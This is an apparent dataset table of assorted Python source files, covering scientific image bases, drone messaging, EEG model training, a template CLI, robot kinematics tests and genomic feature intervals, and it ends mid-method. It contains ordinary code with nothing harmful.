content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
---|---|---|
#!/usr/bin/python
import unittest
import sys
import autocertkit.utils
class DevTestCase(unittest.TestCase):
"""Subclass unittest for extended setup/tear down
functionality"""
session = "nonexistent"
config = {}
@classmethod
def setUpClass(cls):
# Read user config from file
pass
@classmethod
def tearDownClass(cls):
# Destroy the session
pass
| nilq/baby-python | python |
import logging
import numpy as np
from scipy.special import jv
from aspire.basis import FBBasisMixin, SteerableBasis2D
from aspire.basis.basis_utils import unique_coords_nd
from aspire.image import Image
from aspire.utils import complex_type, real_type, roll_dim, unroll_dim
from aspire.utils.matlab_compat import m_flatten, m_reshape
logger = logging.getLogger(__name__)
class FBBasis2D(SteerableBasis2D, FBBasisMixin):
"""
Define a derived class using the Fourier-Bessel basis for mapping 2D images
The expansion coefficients of 2D images on this basis are obtained by
the least squares method. The algorithm is described in the publication:
Z. Zhao, A. Singer, Fourier-Bessel Rotational Invariant Eigenimages,
The Journal of the Optical Society of America A, 30 (5), pp. 871-877 (2013).
"""
# TODO: Methods that return dictionaries should return useful objects instead
def __init__(self, size, ell_max=None, dtype=np.float32):
"""
Initialize an object for the 2D Fourier-Bessel basis class
:param size: The size of the vectors for which to define the basis.
May be a 2-tuple or an integer, in which case a square basis is assumed.
Currently only square images are supported.
:ell_max: The maximum order ell of the basis elements. If no input
(= None), it will be set to np.Inf and the basis includes all
ell such that the resulting basis vectors are concentrated
below the Nyquist frequency (default Inf).
"""
if isinstance(size, int):
size = (size, size)
ndim = len(size)
assert ndim == 2, "Only two-dimensional basis functions are supported."
assert len(set(size)) == 1, "Only square domains are supported."
super().__init__(size, ell_max, dtype=dtype)
def _build(self):
"""
Build the internal data structure to 2D Fourier-Bessel basis
"""
logger.info(
"Expanding 2D images in a spatial-domain Fourier–Bessel"
" basis using the direct method."
)
# get upper bound of zeros, ells, and ks of Bessel functions
self._calc_k_max()
# calculate total number of basis functions
self.count = self.k_max[0] + sum(2 * self.k_max[1:])
# obtain a 2D grid to represent basis functions
self.basis_coords = unique_coords_nd(self.nres, self.ndim, dtype=self.dtype)
# generate 1D indices for basis functions
self._compute_indices()
self._indices = self.indices()
# get normalized factors
self.radial_norms, self.angular_norms = self.norms()
# precompute the basis functions in 2D grids
self._precomp = self._precomp()
def _compute_indices(self):
"""
Create the indices for each basis function
"""
indices_ells = np.zeros(self.count, dtype=int)
indices_ks = np.zeros(self.count, dtype=int)
indices_sgns = np.zeros(self.count, dtype=int)
# We'll also generate a mapping for complex construction
self.complex_count = sum(self.k_max)
# These map indices in complex array to pair of indices in real array
self._pos = np.zeros(self.complex_count, dtype=int)
self._neg = np.zeros(self.complex_count, dtype=int)
i = 0
ci = 0
for ell in range(self.ell_max + 1):
sgns = (1,) if ell == 0 else (1, -1)
ks = np.arange(0, self.k_max[ell])
for sgn in sgns:
rng = np.arange(i, i + len(ks))
indices_ells[rng] = ell
indices_ks[rng] = ks
indices_sgns[rng] = sgn
if sgn == 1:
self._pos[ci + ks] = rng
elif sgn == -1:
self._neg[ci + ks] = rng
i += len(ks)
ci += len(ks)
self.angular_indices = indices_ells
self.radial_indices = indices_ks
self.signs_indices = indices_sgns
# Relating to paper: a[i] = a_ell_ks = a_angularindices[i]_radialindices[i]
self.complex_angular_indices = indices_ells[self._pos] # k
self.complex_radial_indices = indices_ks[self._pos] # q
def indices(self):
"""
Return the precomputed indices for each basis function.
"""
return {
"ells": self.angular_indices,
"ks": self.radial_indices,
"sgns": self.signs_indices,
}
def _precomp(self):
"""
Precompute the basis functions at defined sample points
"""
r_unique = self.basis_coords["r_unique"]
ang_unique = self.basis_coords["ang_unique"]
ind_radial = 0
ind_ang = 0
radial = np.zeros(shape=(len(r_unique), np.sum(self.k_max)), dtype=self.dtype)
ang = np.zeros(
shape=(ang_unique.shape[-1], 2 * self.ell_max + 1), dtype=self.dtype
)
for ell in range(0, self.ell_max + 1):
for k in range(1, self.k_max[ell] + 1):
# Only normalized by the radial part of basis function
radial[:, ind_radial] = (
jv(ell, self.r0[k - 1, ell] * r_unique)
/ self.radial_norms[ind_radial]
)
ind_radial += 1
sgns = (1,) if ell == 0 else (1, -1)
for sgn in sgns:
fn = np.cos if sgn == 1 else np.sin
ang[:, ind_ang] = fn(ell * ang_unique)
ind_ang += 1
return {"radial": radial, "ang": ang}
def norms(self):
"""
Calculate the normalized factors of basis functions
"""
radial_norms = np.zeros(np.sum(self.k_max), dtype=self.dtype)
angular_norms = np.zeros(np.sum(self.k_max), dtype=self.dtype)
norm_fn = self.basis_norm_2d
i = 0
for ell in range(0, self.ell_max + 1):
for k in range(1, self.k_max[ell] + 1):
radial_norms[i], angular_norms[i] = norm_fn(ell, k)
i += 1
return radial_norms, angular_norms
def basis_norm_2d(self, ell, k):
"""
Calculate the normalized factors from radial and angular parts of a specified basis function
"""
rad_norm = (
np.abs(jv(ell + 1, self.r0[k - 1, ell]))
* np.sqrt(1 / 2.0)
* self.nres
/ 2.0
)
ang_norm = np.sqrt(np.pi)
if ell == 0:
ang_norm *= np.sqrt(2)
return rad_norm, ang_norm
def evaluate(self, v):
"""
Evaluate coefficients in standard 2D coordinate basis from those in FB basis
:param v: A coefficient vector (or an array of coefficient vectors) to
be evaluated. The last dimension must equal `self.count`.
:return: The evaluation of the coefficient vector(s) `v` for this basis.
This is an array whose last dimensions equal `self.sz` and the remaining
dimensions correspond to first dimensions of `v`.
"""
if v.dtype != self.dtype:
logger.warning(
f"{self.__class__.__name__}::evaluate"
f" Inconsistent dtypes v: {v.dtype} self: {self.dtype}"
)
# Transpose here once, instead of several times below #RCOPT
v = v.reshape(-1, self.count).T
r_idx = self.basis_coords["r_idx"]
ang_idx = self.basis_coords["ang_idx"]
mask = m_flatten(self.basis_coords["mask"])
ind = 0
ind_radial = 0
ind_ang = 0
x = np.zeros(shape=tuple([np.prod(self.sz)] + list(v.shape[1:])), dtype=v.dtype)
for ell in range(0, self.ell_max + 1):
k_max = self.k_max[ell]
idx_radial = ind_radial + np.arange(0, k_max, dtype=int)
# include the normalization factor of angular part
ang_nrms = self.angular_norms[idx_radial]
radial = self._precomp["radial"][:, idx_radial]
radial = radial / ang_nrms
sgns = (1,) if ell == 0 else (1, -1)
for _ in sgns:
ang = self._precomp["ang"][:, ind_ang]
ang_radial = np.expand_dims(ang[ang_idx], axis=1) * radial[r_idx]
idx = ind + np.arange(0, k_max, dtype=int)
x[mask] += ang_radial @ v[idx]
ind += len(idx)
ind_ang += 1
ind_radial += len(idx_radial)
x = x.T.reshape(-1, *self.sz) # RCOPT
return x
def evaluate_t(self, v):
"""
Evaluate coefficient in FB basis from those in standard 2D coordinate basis
:param v: The coefficient array to be evaluated. The last dimensions
must equal `self.sz`.
:return: The evaluation of the coefficient array `v` in the dual basis
of `basis`. This is an array of vectors whose last dimension equals
`self.count` and whose first dimensions correspond to
first dimensions of `v`.
"""
if v.dtype != self.dtype:
logger.warning(
f"{self.__class__.__name__}::evaluate_t"
f" Inconsistent dtypes v: {v.dtype} self: {self.dtype}"
)
if isinstance(v, Image):
v = v.asnumpy()
v = v.T # RCOPT
x, sz_roll = unroll_dim(v, self.ndim + 1)
x = m_reshape(
x, new_shape=tuple([np.prod(self.sz)] + list(x.shape[self.ndim :]))
)
r_idx = self.basis_coords["r_idx"]
ang_idx = self.basis_coords["ang_idx"]
mask = m_flatten(self.basis_coords["mask"])
ind = 0
ind_radial = 0
ind_ang = 0
v = np.zeros(shape=tuple([self.count] + list(x.shape[1:])), dtype=v.dtype)
for ell in range(0, self.ell_max + 1):
k_max = self.k_max[ell]
idx_radial = ind_radial + np.arange(0, k_max)
# include the normalization factor of angular part
ang_nrms = self.angular_norms[idx_radial]
radial = self._precomp["radial"][:, idx_radial]
radial = radial / ang_nrms
sgns = (1,) if ell == 0 else (1, -1)
for _ in sgns:
ang = self._precomp["ang"][:, ind_ang]
ang_radial = np.expand_dims(ang[ang_idx], axis=1) * radial[r_idx]
idx = ind + np.arange(0, k_max)
v[idx] = ang_radial.T @ x[mask]
ind += len(idx)
ind_ang += 1
ind_radial += len(idx_radial)
v = roll_dim(v, sz_roll)
return v.T # RCOPT
def to_complex(self, coef):
"""
Return complex valued representation of coefficients.
This can be useful when comparing or implementing methods
from literature.
There is a corresponding method, to_real.
:param coef: Coefficients from this basis.
:return: Complex coefficent representation from this basis.
"""
if coef.ndim == 1:
coef = coef.reshape(1, -1)
if coef.dtype not in (np.float64, np.float32):
raise TypeError("coef provided to to_complex should be real.")
# Pass through dtype precions, but check and warn if mismatched.
dtype = complex_type(coef.dtype)
if coef.dtype != self.dtype:
logger.warning(
f"coef dtype {coef.dtype} does not match precision of basis.dtype {self.dtype}, returning {dtype}."
)
# Return the same precision as coef
imaginary = dtype(1j)
ccoef = np.zeros((coef.shape[0], self.complex_count), dtype=dtype)
ind = 0
idx = np.arange(self.k_max[0], dtype=int)
ind += np.size(idx)
ccoef[:, idx] = coef[:, idx]
for ell in range(1, self.ell_max + 1):
idx = ind + np.arange(self.k_max[ell], dtype=int)
ccoef[:, idx] = (
coef[:, self._pos[idx]] - imaginary * coef[:, self._neg[idx]]
) / 2.0
ind += np.size(idx)
return ccoef
def to_real(self, complex_coef):
"""
Return real valued representation of complex coefficients.
This can be useful when comparing or implementing methods
from literature.
There is a corresponding method, to_complex.
:param complex_coef: Complex coefficients from this basis.
:return: Real coefficent representation from this basis.
"""
if complex_coef.ndim == 1:
complex_coef = complex_coef.reshape(1, -1)
if complex_coef.dtype not in (np.complex128, np.complex64):
raise TypeError("coef provided to to_real should be complex.")
# Pass through dtype precions, but check and warn if mismatched.
dtype = real_type(complex_coef.dtype)
if dtype != self.dtype:
logger.warning(
f"Complex coef dtype {complex_coef.dtype} does not match precision of basis.dtype {self.dtype}, returning {dtype}."
)
coef = np.zeros((complex_coef.shape[0], self.count), dtype=dtype)
ind = 0
idx = np.arange(self.k_max[0], dtype=int)
ind += np.size(idx)
ind_pos = ind
coef[:, idx] = complex_coef[:, idx].real
for ell in range(1, self.ell_max + 1):
idx = ind + np.arange(self.k_max[ell], dtype=int)
idx_pos = ind_pos + np.arange(self.k_max[ell], dtype=int)
idx_neg = idx_pos + self.k_max[ell]
c = complex_coef[:, idx]
coef[:, idx_pos] = 2.0 * np.real(c)
coef[:, idx_neg] = -2.0 * np.imag(c)
ind += np.size(idx)
ind_pos += 2 * self.k_max[ell]
return coef
def calculate_bispectrum(
self, coef, flatten=False, filter_nonzero_freqs=False, freq_cutoff=None
):
"""
Calculate bispectrum for a set of coefs in this basis.
The Bispectum matrix is of shape:
(count, count, unique_radial_indices)
where count is the number of complex coefficients.
:param coef: Coefficients representing a (single) image expanded in this basis.
:param flatten: Optionally extract symmetric values (tril) and then flatten.
:param freq_cutoff: Truncate (zero) high k frequecies above (int) value, defaults off (None).
:return: Bispectum matrix (complex valued).
"""
# Bispectrum implementation expects the complex representation of coefficients.
complex_coef = self.to_complex(coef)
return super().calculate_bispectrum(
complex_coef,
flatten=flatten,
filter_nonzero_freqs=filter_nonzero_freqs,
freq_cutoff=freq_cutoff,
)
def rotate(self, coef, radians, refl=None):
"""
Returns coefs rotated by `radians`.
:param coef: Basis coefs.
:param radians: Rotation in radians.
:param refl: Optional reflect image (bool)
:return: rotated coefs.
"""
# Base class rotation expects complex representation of coefficients.
# Convert, rotate and convert back to real representation.
return self.to_real(super().rotate(self.to_complex(coef), radians, refl))
| nilq/baby-python | python |
#! /usr/bin/python3
import os
import sys
import argparse
import time
import signal
from ivy.std_api import *
import logging
PPRZ_HOME = os.getenv("PAPARAZZI_HOME", os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')))
sys.path.append(PPRZ_HOME + "/var/lib/python")
from pprzlink.ivy import IvyMessagesInterface
from pprzlink.message import PprzMessage
from pprzlink import messages_xml_map
try:
msgs = messages_xml_map.get_msgs('test')
except Exception as e:
print(e)
dico = messages_xml_map.message_dictionary
for msg_type in dico.keys():
for msg in dico[msg_type]:
print(msg_type, ":", msg)
ac_id = 24
ivyInterface = IvyMessagesInterface()
time.sleep(0.5)
world = None
uavid = None
def callback01(ac_id, msg, request_id):
print(request_id, msg)
def callback02(ac_id, msg):
print(msg)
ivyInterface.subscribe(callback01, '(.* WORLD_ENV_REQ .*)')
ivyInterface.subscribe(callback02, '(.* GPS .*)')
signal.signal(signal.SIGINT, lambda frame, sig: ivyInterface.stop())
| nilq/baby-python | python |
# Program to generate random account names
# Start simple. Just considering distribution of consonants and
# vowels first. And then look into including the other arrays.
# Compare which will give better results. Just distribution of letters?
# Or taking into account other rules and distribution of other morphemes :)
consonants = [b, c, d, ...]
vowels = [a, e, i, o, u ]
consosnant_digraphs = [ ch, sh, ...]
vowel_digraphs = [ay, ...]
vowel_diphtongs = [ae, ...]
common_last_name_endings = [ ]
common_word_endings = [ ]
common_prefixes = [ ]
common_separators = [ none, '-', '_', '.' ... ]
digits = [0, 1, 2, ... ]
Probably should collapse these to 2-3 arrays and look at the probability/
distribution of vowels and consonants and just put a small probability
for numbers at beginning and end ...
To find:
distribution of word length in english language
distribution/probability of occurence for every consonant/vowel...
distribution of every letter
distribution of first letter
probability of two consonants appearing one next to the other
combinations of consonants that can be found together (for
example, following s, following n, ...
probablity of occurence for last name endings and word endings...
rules about vowels at the end of words
sum probability of occurence for elements in each array
randomly select separator (can sometimes still use - probability 0.07 or
something...)
If separator is none, then start each word with a capital letter
with a probability of 0.9
n is randomly 1, 2, 3, or 4. With highest probablity for 2, and lowest
for 4
for i = 1, n
initialize current_word to 0
start with consonant or random prefix
pick random word_ending (can also be an empty string)
m is length of word (sampled from distribution of word length)
for j = 1, m - len(word_ending) - len(current_word)
if mod(m,2) = 0
get some vowel
if mod(m,2) = 1
get some consonant
if some other condition ...
get one of the others instead
| nilq/baby-python | python |
from __future__ import unicode_literals
from cradmin_legacy.crispylayouts import CradminSubmitButton
class BulkFileUploadSubmit(CradminSubmitButton):
template = 'cradmin_legacy/apps/cradmin_temporaryfileuploadstore/bulkfileupload-submit.django.html'
extra_button_attributes = {
'cradmin-legacy-bulkfileupload-submit': ''
}
def __init__(self, name, value, uploading_text=None, uploading_icon_cssclass=None, **kwargs):
self.uploading_text = uploading_text or value
self.uploading_icon_cssclass = uploading_icon_cssclass
super(BulkFileUploadSubmit, self).__init__(
name, value, **kwargs)
| nilq/baby-python | python |
# coding:utf-8
import os
import timeit
import tensorflow as tf
from tensorflow.python.keras.api._v2.keras import backend as K
from core.get_model import create_EEGNet, create_TSGLEEGNet
from core.training import crossValidate, gridSearch
from core.dataloaders import RawDataloader
from core.generators import RawGenerator
from core.splits import StratifiedKFold, AllTrain
from core.metrics import Kappa
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
gpus = tf.config.experimental.list_physical_devices(device_type='GPU')
print(gpus)
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
K.set_image_data_format('channels_last')
srate = 250
num_classes = 4
batch_size = 10
def time_format(secs):
mins = int(secs // 60)
secs %= 60
hours = mins // 60
mins %= 60
days = hours // 24
hours %= 24
return days, hours, mins, secs
train_datapath = os.path.join('data', 'A', 'TrainSet', 'example_data.mat')
test_datapath = os.path.join('data', 'A', 'TestSet', 'example_data.mat')
datadir = None
# train_datapath = None
# test_datapath = None
# datadir = os.path.join('data', 'A')
start = timeit.default_timer()
# Change kFold, epochs and patience to get higher acc
crossValidate(
create_TSGLEEGNet,
dataLoader=RawDataloader,
splitMethod=AllTrain,
dataGent=RawGenerator,
traindata_filepath=train_datapath,
testdata_filepath=test_datapath,
datadir=datadir,
kFold=5,
# If use 'traindata_filepath' or 'testdata_filepath', set subs=[1]
subs=[1],
shuffle=True,
norm_mode='z-score',
preserve_initfile=False,
reinit=True,
# If needed, turn cropping on.
# But its accuracy evaluation indicator is not clear.
cropping=False,
cpt=0.5,
step=int(0.2 * srate),
max_crop=6,
beg=0.,
end=4.,
srate=srate,
batch_size=batch_size,
epochs=1200,
patience=300)(
nClasses=num_classes,
Chans=22,
F=16,
D=10,
Ns=20,
l1=1e-4,
l21=7.5e-5,
tl1=2.5e-6,
metrics=[
'accuracy',
Kappa(num_classes, sparse_labels=True)
],
lrate=1e-3,
)
# parameters = {
# 'l1': {
# '1': [2.5e-5],
# '2': [1e-3],
# '3': [1e-4],
# '4': [7.5e-5],
# '5': [2.5e-5],
# '6': [5e-5],
# '7': [7.5e-5],
# '8': [1e-3],
# '9': [7.5e-5]
# },
# 'l21':
# {
# '1': [2.5e-5],
# '2': [1e-4],
# '3': [7.5e-5],
# '4': [1e-4],
# '5': [1e-4],
# '6': [1e-4],
# '7': [1e-4],
# '8': [1e-4],
# '9': [1e-4]
# },
# 'tl1': {
# '1': [7.5e-6],
# '2': [7.5e-6],
# '3': [2.5e-6],
# '4': [1e-5],
# '5': [7.5e-6],
# '6': [1e-6],
# '7': [2.5e-6],
# '8': [5e-6],
# '9': [2.5e-5]
# }
# }
# OR
# parameters = {
# 'l1': {
# # '1': [5e-3],
# '2':
# list(np.linspace(1e-2, 2.5e-3, 4)) +
# list(np.linspace(1e-3, 2.5e-4, 4)) +
# list(np.linspace(1e-4, 2.5e-5, 4)) + [1e-5, 0.],
# # '3': [7.5e-4]
# },
# 'l21': [1e-3],
# 'tl1': {
# # '1': [7.5e-4],
# '2': [2.5e-5],
# # '3': [7.5e-4]
# }
# }
# # OR mix them
# gridSearch(
# create_TSGLEEGNet,
# parameters,
# dataLoader=RawDataloader,
# splitMethod=AllTrain,
# dataGent=RawGenerator,
# traindata_filepath=train_datapath,
# testdata_filepath=test_datapath,
# datadir=datadir,
# kFold=5,
# subs=range(2, 3),
# shuffle=True,
# norm_mode='z-score',
# preserve_initfile=False,
# reinit=True,
# cpt=0.5,
# step=int(0.2 * srate),
# max_crop=6,
# beg=0.,
# end=4.,
# srate=srate,
# epochs=1200, # change them
# patience=300)(4, Chans=60, F=16, D=10, Ns=20)
end = timeit.default_timer()
print("Time used: {0:0>2d}d {1:0>2d}h {2:0>2d}m {3:.4f}s".format(
*time_format(end - start))) | nilq/baby-python | python |
"""Manipulate tem variants."""
import os
import sys
from tem import util, var
from tem.cli import common as cli
from .common import print_cli_err
def setup_parser(p):
cli.add_general_options(p)
p.add_argument("variants", nargs="*", help="set the active variant")
mutex = p.add_mutually_exclusive_group()
mutex.add_argument(
"-q",
"--query",
action="store_true",
help="query if VARIANTs are active",
)
mutex.add_argument(
"-a",
"--activate",
action="store_true",
help="activate VARIANTs [default]",
)
mutex.add_argument(
"-d", "--deactivate", action="store_true", help="disable VARIANTs"
)
mutex.add_argument(
"-x",
"--exclusive",
action="store_true",
help="activate VARIANTs, deactivate all others",
)
p.add_argument(
"-v",
"--verbose",
action="store_true",
help="print all active variants",
)
p.set_defaults(func=cmd)
def query(args):
"""Query if specified variants are active."""
exit_with_fail = False
for arg_variant in args.variants:
if arg_variant not in var.active_variants():
if not args.verbose:
sys.exit(1)
else:
exit_with_fail = True
if exit_with_fail:
sys.exit(1)
def no_action(args):
return not (
args.activate or args.deactivate or args.exclusive or args.query
)
@cli.subcommand
def cmd(args):
"""Execute this subcommand."""
# TODO make it so users can only choose from an existing pool of variants
# and so that new variants can be registered using a special option
if not os.path.exists(".tem"):
print_cli_err("this is not a temdir")
util.print_err("Try running `tem init` first.")
return
if no_action(args):
if args.variants: # variants not empty
args.activate = True
else:
args.verbose = True
if args.activate: # --activate option
var.activate(args.variants)
if args.exclusive: # --exclusive option
var.set_active_variants(args.variants)
elif args.deactivate: # --deactivate option
var.deactivate(args.variants)
elif args.query: # --query option
query(args)
# This will run either when the --verbose option is given, or when
# this command is run simply as `tem var`
if args.verbose:
variants = var.active_variants()
print(*(variants if variants else ["default"]), sep="\n")
| nilq/baby-python | python |
import os
import pathlib
import random
import json
import kinpy as kp
import numpy as np
from tests.test_urdf_parser import (
urdf_path_to_json_path,
PRECOMPUTED_KINEMATICS_DIR_NAME,
URDF_EXAMPLES_DIR
)
def initialize_state(robot):
"""Creates a dictionary whose entries each correspond to a movable joint of the input
:py:class:`Robot`, with all values (joint positions) set to 0.
Args:
robot (Robot): A TriP Robot.
Returns:
(dict): Dictionary representing the robot's state, with all values initialized to zeros.
"""
return {
joint_name: 0
for joint_name in robot.get_actuated_state()
}
def create_kinpy_chain(path):
"""Takes a path to a URDF file and converts it into a kinpy kinematic chain.
Args:
path (str): Path to a URDF file.
Returns:
(Chain): kinpy kinematic chain.
"""
with open(path, encoding='utf8') as file:
urdf_data_str = file.read()
return kp.build_chain_from_urdf(urdf_data_str)
def generate_forward_kinematics_json(urdf_path, rng_states_count=10):
"""Calculates forward kinematics for the input URDF file using kinpy and saves these to a
JSON file.
Args:
path (str): Path to the URDF file.
rng_states_count (int, optional): The number of randomized states. Defaults to 10.
"""
# Setup kinpy chain
try:
chain_kinpy = create_kinpy_chain(urdf_path)
except KeyError as err:
raise ValueError(
f'File {urdf_path} is not valid. Unsupported joint type? Missing tag? (error was {err})'
) from err
# First state: initialize all joint values to zero
state_init = {
joint_name: 0
for joint_name in chain_kinpy.get_joint_parameter_names()
}
test_states = [state_init]
# RNG states: initialize a number of states with random values
for _ in range(rng_states_count):
new_state = {
joint: random.uniform(-np.pi, np.pi)
for joint in state_init.keys()
}
test_states.append(new_state)
# Save forward kinematics results and joint positions for all states
forward_kinematics = [
{
'state': state,
'transformations': {
link: {'rot': list(transform.rot),
'pos': list(transform.pos)}
for link, transform in chain_kinpy.forward_kinematics(state).items()
}
}
for state in test_states
]
return json.dumps(forward_kinematics, separators=(',', ':'))
def main():
precomputed_kinematics_dir = pathlib.Path(URDF_EXAMPLES_DIR) / PRECOMPUTED_KINEMATICS_DIR_NAME
precomputed_kinematics_dir.mkdir(exist_ok=True)
# Iterate through files for which we compute forward kinematics. Skip subdirectories of
# urdf_examples_dir, because as of now, the only subdirectory contains (intentionally) broken
# URDFs. If that changes, change this too.
for entry in os.scandir(URDF_EXAMPLES_DIR):
if entry.is_file() and pathlib.Path(entry).suffix == '.urdf':
with open(urdf_path_to_json_path(entry.path), 'w', encoding='utf8') as file:
forward_kinematics = generate_forward_kinematics_json(entry.path)
file.write(forward_kinematics)
if __name__ == '__main__':
main()
| nilq/baby-python | python |
"""
Object representation of features. Includes an abstract feature class that is also used by transcripts.
Each object is capable of exporting itself to BED and GFF3.
"""
from typing import Optional, Any, Dict, List, Set, Iterable, Hashable
from uuid import UUID
from inscripta.biocantor.exc import (
EmptyLocationException,
NoSuchAncestorException,
NoncodingTranscriptError,
)
from inscripta.biocantor.gene.cds_frame import CDSPhase
from inscripta.biocantor.gene.interval import AbstractFeatureInterval, QualifierValue, IntervalType
from inscripta.biocantor.io.bed import BED12, RGB
from inscripta.biocantor.io.gff3.constants import GFF_SOURCE, NULL_COLUMN, BioCantorFeatureTypes, BioCantorQualifiers
from inscripta.biocantor.io.gff3.exc import GFF3MissingSequenceNameError
from inscripta.biocantor.io.gff3.rows import GFFAttributes, GFFRow
from inscripta.biocantor.location.location import Location
from inscripta.biocantor.location.strand import Strand
from inscripta.biocantor.parent.parent import Parent, SequenceType
from inscripta.biocantor.util.bins import bins
from inscripta.biocantor.util.hashing import digest_object
class FeatureInterval(AbstractFeatureInterval):
"""FeatureIntervals are generic intervals. These can be used to model genome promoters,
open chromatin sites, etc.
"""
interval_type = IntervalType.FEATURE
_identifiers = ["feature_name", "feature_id"]
def __init__(
self,
interval_starts: List[int],
interval_ends: List[int],
strand: Strand,
qualifiers: Optional[Dict[Hashable, QualifierValue]] = None,
sequence_guid: Optional[UUID] = None,
sequence_name: Optional[str] = None,
feature_types: Optional[List[str]] = None,
feature_name: Optional[str] = None,
feature_id: Optional[str] = None,
guid: Optional[UUID] = None,
feature_guid: Optional[UUID] = None,
is_primary_feature: Optional[bool] = None,
parent_or_seq_chunk_parent: Optional[Parent] = None,
):
self._location = self.initialize_location(interval_starts, interval_ends, strand, parent_or_seq_chunk_parent)
self._genomic_starts = interval_starts
self._genomic_ends = interval_ends
self.start = self.genomic_start = interval_starts[0]
self.end = self.genomic_end = interval_ends[-1]
self._strand = strand
self._parent_or_seq_chunk_parent = parent_or_seq_chunk_parent
self.sequence_guid = sequence_guid
self.sequence_name = sequence_name
self.feature_types = set(feature_types) if feature_types else set() # stored as a set of types
self.feature_name = feature_name
self.feature_id = feature_id
# qualifiers come in as a List, convert to Set
self._import_qualifiers_from_list(qualifiers)
self.bin = bins(self.start, self.end, fmt="bed")
self._is_primary_feature = is_primary_feature
if guid is None:
self.guid = digest_object(
self._genomic_starts,
self._genomic_ends,
self.qualifiers,
self.sequence_name,
self.feature_types,
self.feature_name,
self.feature_id,
self.is_primary_feature,
)
else:
self.guid = guid
self.feature_guid = feature_guid
def __str__(self):
return f"FeatureInterval(({self.chromosome_location}), name={self.feature_name})"
def __repr__(self):
return "<{}>".format(str(self))
@property
def id(self) -> str:
"""Returns the ID of this feature. Provides a shared API across genes/transcripts and features."""
return self.feature_id
@property
def name(self) -> str:
"""Returns the name of this feature. Provides a shared API across genes/transcripts and features."""
return self.feature_name
@property
def cds_start(self) -> int:
raise NoncodingTranscriptError("No CDS start for non-transcribed features")
@property
def cds_end(self) -> int:
raise NoncodingTranscriptError("No CDS end for non-transcribed features")
@property
def chunk_relative_cds_start(self) -> int:
raise NoncodingTranscriptError("No CDS start for non-transcribed features")
@property
def chunk_relative_cds_end(self) -> int:
raise NoncodingTranscriptError("No CDS end for non-transcribed features")
@property
def cds_location(self) -> Location:
"""Returns the Location of the CDS in *chromosome coordinates*"""
raise NoncodingTranscriptError("No location on a non-transcribed feature")
@property
def cds_chunk_relative_location(self) -> Location:
"""Returns the Location of the CDS in *chunk relative coordinates*"""
raise NoncodingTranscriptError("No location on a non-transcribed feature")
@property
def is_coding(self) -> bool:
raise NoncodingTranscriptError("Non-transcribed features cannot be coding")
@property
def has_in_frame_stop(self) -> bool:
raise NoncodingTranscriptError("Cannot have frameshifts on non-transcribed features")
@property
def cds_size(self) -> int:
"""CDS size, regardless of chunk relativity (does not shrink)"""
raise NoncodingTranscriptError("No cds size on a non-transcribed feature")
@property
def chunk_relative_cds_size(self) -> int:
"""Chunk relative CDS size (can shrink if the Location is a slice of the full transcript)"""
raise NoncodingTranscriptError("No chunk-relative CDS size on a non-transcribed feature")
def to_dict(self, chromosome_relative_coordinates: bool = True) -> Dict[str, Any]:
"""Convert to a dict usable by :class:`biocantor.io.models.FeatureIntervalModel`."""
if chromosome_relative_coordinates:
interval_starts = self._genomic_starts
interval_ends = self._genomic_ends
else:
interval_starts, interval_ends = list(zip(*((x.start, x.end) for x in self.relative_blocks)))
return dict(
interval_starts=interval_starts,
interval_ends=interval_ends,
strand=self.strand.name,
qualifiers=self._export_qualifiers_to_list(),
feature_id=self.feature_id,
feature_name=self.feature_name,
feature_types=sorted(self.feature_types) if self.feature_types else None,
sequence_name=self.sequence_name,
sequence_guid=self.sequence_guid,
feature_interval_guid=self.guid,
feature_guid=self.feature_guid,
is_primary_feature=self._is_primary_feature,
)
@staticmethod
def from_dict(vals: Dict[str, Any], parent_or_seq_chunk_parent: Optional[Parent] = None) -> "FeatureInterval":
"""Build a :class:`FeatureInterval` from a dictionary."""
return FeatureInterval(
interval_starts=vals["interval_starts"],
interval_ends=vals["interval_ends"],
strand=Strand[vals["strand"]],
qualifiers=vals["qualifiers"],
sequence_guid=vals["sequence_guid"],
sequence_name=vals["sequence_name"],
feature_types=vals["feature_types"],
feature_name=vals["feature_name"],
feature_id=vals["feature_id"],
guid=vals["feature_interval_guid"],
feature_guid=vals["feature_guid"],
is_primary_feature=vals["is_primary_feature"],
parent_or_seq_chunk_parent=parent_or_seq_chunk_parent,
)
@staticmethod
def from_location(
location: Location,
qualifiers: Optional[Dict[Hashable, QualifierValue]] = None,
sequence_guid: Optional[UUID] = None,
sequence_name: Optional[str] = None,
guid: Optional[UUID] = None,
feature_guid: Optional[UUID] = None,
feature_types: Optional[List[str]] = None,
feature_id: Optional[str] = None,
feature_name: Optional[str] = None,
is_primary_feature: Optional[str] = None,
) -> "FeatureInterval":
return FeatureInterval(
interval_starts=[x.start for x in location.blocks],
interval_ends=[x.end for x in location.blocks],
strand=location.strand,
guid=guid,
feature_guid=feature_guid,
qualifiers=qualifiers,
sequence_name=sequence_name,
sequence_guid=sequence_guid,
feature_types=feature_types,
feature_id=feature_id,
feature_name=feature_name,
is_primary_feature=is_primary_feature,
parent_or_seq_chunk_parent=location.parent,
)
def intersect(
self,
location: Location,
new_guid: Optional[UUID] = None,
new_qualifiers: Optional[dict] = None,
) -> "FeatureInterval":
"""Returns a new FeatureInterval representing the intersection of this FeatureInterval's location with the
other location.
Strand of the other location is ignored; returned FeatureInterval is on the same strand as this FeatureInterval.
"""
if not new_qualifiers:
new_qualifiers = self.qualifiers
location_same_strand = location.reset_strand(self.chromosome_location.strand)
intersection = self.chromosome_location.intersection(location_same_strand)
if intersection.is_empty:
raise EmptyLocationException("Can't intersect disjoint intervals")
starts = [x.start for x in intersection.blocks]
ends = [x.end for x in intersection.blocks]
return FeatureInterval(
starts,
ends,
strand=intersection.strand,
guid=new_guid,
qualifiers=new_qualifiers,
parent_or_seq_chunk_parent=intersection.parent,
)
def export_qualifiers(
self, parent_qualifiers: Optional[Dict[Hashable, Set[str]]] = None
) -> Dict[Hashable, Set[str]]:
"""Exports qualifiers for GFF3/GenBank export"""
qualifiers = self._merge_qualifiers(parent_qualifiers)
for key, val in [
[BioCantorQualifiers.FEATURE_SYMBOL.value, self.feature_name],
[BioCantorQualifiers.FEATURE_ID.value, self.feature_id],
]:
if not val:
continue
if key not in qualifiers:
qualifiers[key] = set()
qualifiers[key].add(val)
if self.feature_types:
